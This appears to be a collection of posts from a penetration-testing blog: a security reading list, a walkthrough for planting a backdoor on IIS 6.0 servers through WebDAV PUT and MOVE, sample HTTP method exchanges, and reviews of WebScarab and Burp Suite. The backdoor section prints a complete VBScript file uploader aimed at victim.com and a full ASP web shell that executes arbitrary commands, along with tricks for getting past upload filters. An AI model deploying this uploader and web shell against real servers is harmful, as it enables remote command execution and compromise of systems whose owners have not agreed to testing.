www.notsosecure.com

Although, i don't have the habit of reading books, here are a few books which you may consider reading.

———– 

Database Hackers Handbook.(David Litchfield)

Oracle Hacker's handbook (David Litchfield) 

Hacking Web Applications Exposed (TMH Publications)

Essential PHP Security (Chris Shifflett)

TCP/IP Illustrated (Comer).

Hacking Linux Exposed. 

——- 

As this list is really small, it is clear that i need to read more books. If you know any good book related to pentesting (or security in general) please share it with us.

Credits: ice  and ferruh

In IIS 6.0 you can upload the backdoor scripts but u may not be able to execute the default cmd.exe present in the iis box, so u need to upload your own cmd.exe first and then make your asp backdoor point to the cmd.exe which you uploaded.

Steps:

1. Upload cmd.exe to /scripts/ folder: Use the script below published by http://www.eggheadcafe.com/articles/20010829.asp which will allow you to upload cmd.exe (or any other binary) to the vulnerable server. You may not be able to upload a .exe file, so rename cmd.exe to  cmd.txt and then use the move method to copy it back from cmd.txt to cmd.exe. Note that cmd.exe must be copied to the /scripts/ folder of IIS where you have by default execute privileges.

Here is the upload script: 

<script language=VBSCRIPT> dim strURL function sendit( sfileName, sType) sData = getFileBytes(sfileName, sType) sfileName= mid(sfileName, InstrRev(sFileName,"\")+1,len(sfileName)) dim xmlhttp set xmlhttp=createobject("MSXML2.XMLHTTP.3.0")
strURL = "http://victim.com/scripts/" & sFileName msgbox "URL is: " & strURL xmlhttp.Open "PUT", strURL, false xmlhttp.Send sData show.innerText= "Status: " & xmlhttp.statusText set xmlhttp=Nothing End function
sub showresult()
document.write "<CENTER>Take A look!<BR><A xhref=" & strURL & ">"& strURL & "</a></CENTER>"
end sub

<TABLE align=center>
<TR><TD><input type=FILE id=filedata ></TD></TR>
<TR><TD><input type=submit onclick="Call sendit( filedata.value, filetype.value)"></TD></TR>
<TR><TD><input type=checkBox id=filetype checked >Type Binary (Uncheck for Type Text)</TD></TR>
<TR><TD><input type=button value = "SHOW IT" onclick ="showresult()"></TD></TR>
</TABLE>
<div id=show align=center></div>

2.Upload the cmd.asp file to /scripts/ folder: Use the same upload script running locally on your system to upload the cmd.asp, from (http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html)  

<!– IIS6 VBscript command shell –>

<!– aramosf@unsec.net http://www.514.es –>

<title>514 aspshell</title> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="cmd" size=45 value="<%= cmd %>">
<input type=submit value="Run">
</FORM>
<%
If (request("cmd") <> "") Then
Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)
End If
%>

You need to make the script point to the cmd.exe you uploaded in the scripts folder. You will need the absolute path, so the line:

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)

may look something like: 

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec("C:\Inetpub\Scripts\mycmd.exe /c " &

request("cmd")).stdout.readall)

You may not be able to upload the .asp file, so rename it as .txt and use the move method to copy it again as .asp on the server. That's it, job done, your backdoor should work fine now

- Questions:———————-

1. How to obtain the absolute path. add this line to your backdoor:

<%=Server.Mappath("/scripts/")%> 

This will give you the full path, make necessary changes to your backdoor and upload it again.

————————–

2. What if the scripts directory is not present?

I think the attack will fail as you wont have the execute permissions:

—————————

3. Is it a good practice to not have /scripts/ folder in the document root?

Think so.

———————–
'''Syntax:'''
———————-
 Example- PUT Method:

>>Request 

PUT /foo.txt HTTP/1.1

Host: www.victim.com

Content-Length: 4

test

>>Response 

HTTP/1.1 201 Created
Date: Thu, 14 Jun 2007 09:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.victim.com/foo.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
   

————————

Example - DELETE

>>Request   

DELETE  /container/ HTTP/1.1   

Host: www.foo.bar

>>Response   

HTTP/1.1 207 Multi-Status    Content-Type: text/xml; charset="utf-8"    Content-Length: xxxx    <?xml version="1.0" encoding="utf-8" ?>    <d:multistatus xmlns:d="DAV:">      <d:response>           <d:href>http://www.foo.bar/container/resource3</d:href>           <d:status>HTTP/1.1 423 Locked</d:status>      </d:response>    </d:multistatus>

————-

Example- MOVE
>>Request

   MOVE /~fielding/index.html HTTP/1.1
   Host: www.ics.uci.edu
   Destination: http://www.ics.uci.edu/users/f/fielding/index.html

>>Response

   HTTP/1.1 201 Created
   Location: http://www.ics.uci.edu/users/f/fielding/index.html

————

More HTTP methods:http://www.webdav.org/specs/rfc2518.html
————

Webscarab is perhaps the only tool i can think of for this. I use this tool to figure out whether the session ids are predictable or not. The ‘visualisation’ feature is just great. Although the interface is not a very well designed and if you are a new user you have difficulties operating this tool but once you learn this tool its very handy. Some other great features include the compare feature which is a bit like ‘diff’ command in unix.

Another feature why i like this tool is for the inbuilt fuzzing module. Just specify the parameter in the request which you want to fuzz and point to the file containing the values, which you would like the paramter to take. Then use the ‘compare’ section to compare different responses and this should indicate whether fuzzing was successful or not. Although this also has a built in proxy feature, but i still prefer burp for proxy may be becuase of the better gui.

For the basic cookie analysis i use a firefox plugin. This plugin allows you to view all the cookies for a partciular domain currently set in your browser, and also allows you to edit them.

This weekend as i have nothing better to do, lemme talk about my experiences with proxy tools:

1. Proxy Tool: Parameter Manipulation is a very important stage of web app testing, and without this, the test will be incomplete. I was using tools like Paros and Achillies for achieveing this, but the problem with both of them was they were highly unstable and would crash every now and then. Thus if the customer has asked you to provide all the logs of testing, it would be difficult for you to provide logs if tools were to crash. I currently use Burp Suite. I find it is highly stable and comes with this feature of viewing request/response as text, parameter, and as hex. Viewing request and response as ‘param’ helps me particulary when dealing with asp .net applications becuase of the long value of viewstate and other .net stuff. Another interesting feature of Burp is the repeater module, which could be used to send modified requests to server multiple times. I use this feature mostly to figure out the ‘non essential’ parameters of the unmodified request and then to focus on the essential parametes. Best way to learn the capabilities of this tool is to download it and then play with it.